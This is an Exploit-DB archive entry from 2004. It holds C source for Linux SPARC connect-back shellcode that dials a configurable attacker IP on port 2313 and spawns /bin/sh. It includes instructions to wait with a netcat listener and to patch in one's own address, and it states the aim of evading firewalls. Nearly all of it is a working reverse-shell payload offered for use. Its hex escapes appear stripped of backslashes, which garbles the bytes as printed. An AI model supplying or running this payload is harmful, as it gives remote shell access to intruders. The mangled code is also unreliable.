https://www.exploit-db.com/exploits/13305

漏洞细节尚未披露

/* linux (sparc) connect back shellcode, because someone had to evade those firewalls. *sigh* */

/*
 * OS           : Linux
 * Architecture : Sparc
 * Type         : Connect Back
 * Lenght       : 216 Bytes
 * Listen-Port  : 2313/TCP
 * Default IP   : 192.168.100.1 ( see how you'll change it at the end. )
 *
 * null bytes (0x00), breaks (0x0a), nops, fork(), ... avoided.
 * was tested accordingly, couldn't optimized more.
 * plug it in your code, launch nc -l -vvv -p 2313 and wait for it.
 *
 * (c) 2002 killah @ hack . gr
 * All rights reserved.
 *
 */

#define NAME "Linux Sparc Connect-Back"

char cb_linux_sparc[]=
  "x9dxe3xbfx80"    // save  %sp, -128, %sp
  "x90x10x20x02"    // mov  2, %o0
  "xd0x37xbfxe0"    // sth  %o0, [ %fp + -32 ]
  "x90x10x29x09"    // mov  0x909, %o0
  "xd0x37xbfxe2"    // sth  %o0, [ %fp + -30 ]
  "x13x30x2ax19"    // sethi  %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
  "x90x12x60x01"    // or  %o1, 1, %o0             <- ALSO THIS.
  "xd0x27xbfxe4"    // st  %o0, [ %fp + -28 ]
  "x90x10x20x02"    // mov  2, %o0
  "x92x10x20x01"    // mov  1, %o1
  "x94x22x60x01"    // sub  %o1, 1, %o2
  "xd0x23xa0x44"    // st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"    // st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"    // st  %o2, [ %sp + 0x4c ]
  "x90x10x20x01"    // mov  1, %o0
  "x92x03xa0x44"    // add  %sp, 0x44, %o1
  "x82x10x20xce"    // mov  0xce, %g1
  "x91xd0x20x10"    // ta  0x10
  "xd0x27xbfxf4"    // st  %o0, [ %fp + -12 ]
  "x92x07xbfxe0"    // add  %fp, -32, %o1
  "xd0x07xbfxf4"    // ld  [ %fp + -12 ], %o0
  "x94x10x20x10"    // mov  0x10, %o2
  "xd0x23xa0x44"    // st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"    // st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"    // st  %o2, [ %sp + 0x4c ]
  "x90x10x20x03"    // mov  3, %o0
  "x92x03xa0x44"    // add  %sp, 0x44, %o1
  "x82x10x20xce"    // mov  0xce, %g1
  "x91xd0x20x10"    // ta  0x10
  "xd0x07xbfxf4"    // ld  [ %fp + -12 ], %o0
  "x92x1ax40x09"    // xor  %o1, %o1, %o1
  "x82x10x20x5a"    // mov  0x5a, %g1
  "x91xd0x20x10"    // ta  0x10
  "xd0x07xbfxf4"    // ld  [ %fp + -12 ], %o0
  "x92x10x20x01"    // mov  1, %o1
  "x82x10x20x5a"    // mov  0x5a, %g1
  "x91xd0x20x10"    // ta  0x10
  "xd0x07xbfxf4"    // ld  [ %fp + -12 ], %o0
  "x92x10x20x02"    // mov  2, %o1
  "x82x10x20x5a"    // mov  0x5a, %g1
  "x91xd0x20x10"    // ta  0x10
  "x2dx0bxd8x9a"    // sethi  %hi(0x2f626800), %l6
  "xacx15xa1x6e"    // or  %l6, 0x16e, %l6
  "x2fx0bxdcxda"    // sethi  %hi(0x2f736800), %l7
  "x90x0bx80x0e"    // and  %sp, %sp, %o0
  "x92x03xa0x08"    // add  %sp, 8, %o1
  "xa6x10x20x01"    // mov  1, %l3
  "x94x24xe0x01"    // sub  %l3, 1, %o2
  "x9cx03xa0x10"    // add  %sp, 0x10, %sp
  "xecx3bxbfxf0"    // std  %l6, [ %sp + -16 ]
  "xd0x23xbfxf8"    // st  %o0, [ %sp + -8 ]
  "xc0x23xbfxfc"    // clr  [ %sp + -4 ]
  "x82x10x20x3b"    // mov  0x3b, %g1
  "x91xd0x20x10";   // ta  0x10

int
main()
{
  int (*test)();
  test = (int (*)()) cb_linux_sparc;
  printf("%s shellcodentSize = %dn",NAME,strlen(cb_linux_sparc));
  (int)(*test)();
  exit(0);
}

/*******************************************************************************

 here it is the C code, that will give you the IPv4 Address of your 
 box, in a big-endianess style, so to replace it inside shellcode and
 get the whole thing working for you.

 example:
  int main() { printf(" 0x%02x%02x%02x%02xn",192,168,100,1); exit(0); }
  or @ bash     printf "0x%02x%02x%02x%02xn" 192 168 100 1

 i believe no further explanation needed.

********************************************************************************/

//EOF

// milw0rm.com [2004-09-26]